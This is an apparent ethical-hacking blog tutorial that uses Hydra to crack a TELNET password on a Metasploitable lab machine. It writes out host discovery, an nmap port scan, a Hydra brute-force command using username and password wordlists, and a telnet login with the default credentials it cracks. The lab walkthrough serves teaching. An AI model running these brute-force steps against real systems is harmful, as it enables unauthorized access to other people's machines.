Cracking TELNET Password Using Hydra

Today we are going learn how to access the victim machine by cracking the password of TELNET service. 

Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking.

What is TELNET?

  • Telnet(Terminal Network) is an application protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection

What is Hydra?

  • Hydra is a parallelized login cracker which supports numerous protocols to attack.
  • New modules are easy to add, beside that, it is flexible and very fast.
  • This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

Practical:

  • Attacker: Kali Linux(OS), Hydra(Tool), Wordlist.
  • Victim: Metasploitable(OS), TELNET(Service). 

 sudo netdiscover

Netdiscover
  • Here we got the IP (192.168.0.22) of victim. Now lets scan for TELNET service.
 nmap -sV -p 23 192.168.0.22

  • The nmap says that the victim is running TELNET service. Now its time for cracking the password of TELNET with the help of Hydra tool.
 hydra -help

 hydra -L users.txt -P passwords.txt 192.168.0.22 telnet

  • Here,

        -L is list of usernames

        -P is list of Passwords

        -t is number of tasks

  • Here we go, the username is msfadmin and password is msfadmin .
  • Now lets try to connect to TELNET with these credentials.
telnet 192.168.0.22

  • Here we got remote login into victim machine.
 

Be Aware, Be Secure.

Thank You 🙏

Comments

Popular posts from this blog

Demo 1- How to Track Location by a Link

Snyk - Ubuntu 20.04 (Linux)

Cracking VNC Password Using Hydra